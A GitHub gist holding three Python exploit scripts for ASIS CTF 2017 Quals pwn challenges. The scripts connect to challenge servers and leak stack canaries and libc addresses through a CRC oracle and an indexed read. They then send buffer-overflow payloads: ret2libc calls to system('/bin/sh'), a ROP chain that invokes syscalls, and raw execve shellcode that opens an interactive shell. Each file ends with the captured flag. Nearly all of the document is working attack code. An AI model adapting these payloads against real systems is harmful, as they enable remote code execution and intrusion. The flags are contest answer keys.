Skip to content

Instantly share code, notes, and snippets.

@ytn86

ytn86/crc.py

Created April 9, 2017 15:55
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ytn86/c32f89a550d55ca07ce5e296f4d9a085 to your computer and use it in GitHub Desktop.
Save ytn86/c32f89a550d55ca07ce5e296f4d9a085 to your computer and use it in GitHub Desktop.
Download ZIP
ASIS CTF 2017 Quals
Raw
crc.py
#! python3
from ctflib import Pwn
from ctflib.util import *
from binascii import crc32
def exploit(cn):
def menu():
return cn.read_until(b'Choice: ')
def get_crc(addr, size):
cn.send(b'1\n')
cn.read_until(b'data: ')
cn.send(str(size).encode() + b'\n')
payload = b''
payload += b'A'*100
payload += pI(addr)
cn.send(payload + b'\n')
cn.read_until(b'CRC is: ')
crc = cn.read_until(b'\n')[:-1]
return crc
def leak(addr):
crc = []
menu()
crc.append(int(get_crc(addr, 1)[2:], 16))
menu()
crc.append(int(get_crc(addr+1, 1)[2:], 16))
menu()
crc.append(int(get_crc(addr+2, 1)[2:], 16))
menu()
crc.append(int(get_crc(addr+3, 1)[2:], 16))
addr = []
for val in crc:
for i in range(0, 0x100):
if crc32(pB(i)) == val:
addr.append(hex(i)[2:].zfill(2))
break
addr.reverse()
return int(''.join(addr), 16)
got_gets = 0x08049fdc
libc_gets_offset = 0x5e890
libc_system_offset = 0x0003a940
libc_binsh_offset = 0x158e8b
bss_size = 0x0804a040
stack = leak(bss_size)
print('stack : {}'.format(hex(stack)))
canary = leak(stack-0x40+0x0c)
print('canary : {}'.format(hex(canary)))
libc_gets = leak(got_gets)
libc_base = libc_gets - libc_gets_offset
libc_system = libc_base + libc_system_offset
libc_binsh = libc_base + libc_binsh_offset
print('libc base : {}'.format(hex(libc_base)))
payload = b''
payload += b'A'*0x28
payload += pI(canary)
payload += pI(0xdeadbeef)*3
payload += pI(libc_system)
payload += pI(0xdeadbeef)
payload += pI(libc_binsh)
menu()
input('attach')
cn.send(payload + b'\n')
cn.interact()
def main():
cn = Pwn()
#cn.connect('localhost', 4002)
cn.connect('69.90.132.40', 4002)
exploit(cn)
if __name__ == '__main__':
main()
"""
ASIS{db17755326b5df9dab92e18e43c3ee51}
"""
Raw
randomGenerator.py
#! python3
from ctflib import Pwn
from ctflib.util import *
def exploit(cn):
pop_rsi_r15_ret = 0x400f61
pop_rdi_ret = 0x400f63
pop_rax_rdi_ret = 0x400f8c
syscall_ret = 0x400f8f
mov_edx_ret = 0x400f89
libc_printf_offset = 0x00055800
libc_system_offset = 0x00045390
libc_binsh_offset = 0x0018c177
def read_value(idx):
cn.read_until(b'want to get?\n')
cn.send(str(idx).encode() + b'\n')
if idx != 0:
cn.read_until(b'Your value = ')
val = cn.read_until(b'\n')
return val
canary = "0x"
canary += hex(int(read_value(7), 10))[2:].zfill(2)
canary += hex(int(read_value(6), 10))[2:].zfill(2)
canary += hex(int(read_value(5), 10))[2:].zfill(2)
canary += hex(int(read_value(4), 10))[2:].zfill(2)
canary += hex(int(read_value(3), 10))[2:].zfill(2)
canary += hex(int(read_value(2), 10))[2:].zfill(2)
canary += hex(int(read_value(1), 10))[2:].zfill(2)
canary += "00"
canary = int(canary, 16)
print('canary : {}'.format(hex(canary)))
input('attach?')
payload = b''
payload += b'A'*1024
payload += b'B'*8
# canary
payload += pQ(canary)
# RBP
payload += pQ(0x4141414141414141)
#ROP
# Leak libc address
# write(1, 0x602018-0x18-0x10, 0x50);y
payload += pQ(pop_rax_rdi_ret)
payload += pQ(1)
payload += pQ(1)
payload += pQ(pop_rsi_r15_ret)
payload += pQ(0x50)
payload += pQ(0x50)
payload += pQ(mov_edx_ret)
payload += pQ(pop_rsi_r15_ret)
payload += pQ(0x602018 - 0x18 - 0x10)
payload += pQ(0x602018 - 0x18 - 0x10)
payload += pQ(syscall_ret)
# pivot to return _start
payload += pQ(pop_rdi_ret)*9
read_value(0)
cn.read_until(b'comment:')
cn.send(payload + b'\n')
cn.recv(1024)
buf = cn.recv(128)
libc_printf = upQ(buf[(0x18+0x10):(0x18+0x10+0x8)])
libc_setvbuf = upQ(buf[(0x18+0x10+0x8):(0x18+0x10+0x8+0x8)])
libc_start_main = upQ(buf[(0x18+0x10+0x8+0x10):(0x18+0x10+0x8+0x18)])
libc_base = libc_printf - libc_printf_offset
libc_system = libc_base + libc_system_offset
libc_binsh = libc_base + libc_binsh_offset
print('libc_base : {}'.format(hex(libc_base)))
print('libc_system : {}'.format(hex(libc_system)))
print('libc_binsh : {}'.format(hex(libc_binsh)))
payload2 = b''
payload2 += b'A'*1024
payload2 += b'B'*8
payload2 += pQ(canary)
payload2 += pQ(0xdeadbeef)
# system('/bin/sh');
payload2 += pQ(pop_rdi_ret)
payload2 += pQ(libc_binsh)
payload2 += pQ(libc_system)
read_value(0)
cn.read_until(b'comment:')
cn.send(payload2 + b'\n')
cn.interact()
def main():
cn = Pwn()
#cn.connect('localhost', 4000)
cn.connect('69.90.132.40', 4000)
exploit(cn)
if __name__ == '__main__':
main()
"""
ASIS{e77c4a76d8079b330e7e78e8e3f434c4}
"""
Raw
start.py
#! python3
from ctflib import Pwn
from ctflib.util import *
import time
def exploit(cn):
plt_read = 0x400400
bss_buf = 0x601000
payload = b''
payload += b'A'*24
payload += pQ(0x4005c1)
payload += pQ(bss_buf)
payload += pQ(0)
payload += pQ(plt_read)
payload += pQ(bss_buf)
input('aaa')
cn.send(payload + b'\n')
time.sleep(1)
sc = b'\x90'*0x20
sc += b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'
cn.send(sc + b'\n')
cn.interact()
def main():
cn = Pwn()
cn.connect('139.59.114.220', 10001)
#cn.connect('localhost', 10001)
exploit(cn)
if __name__ == '__main__':
main()
"""
ASIS{y0_execstack_saves_my_l1f3}
"""
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment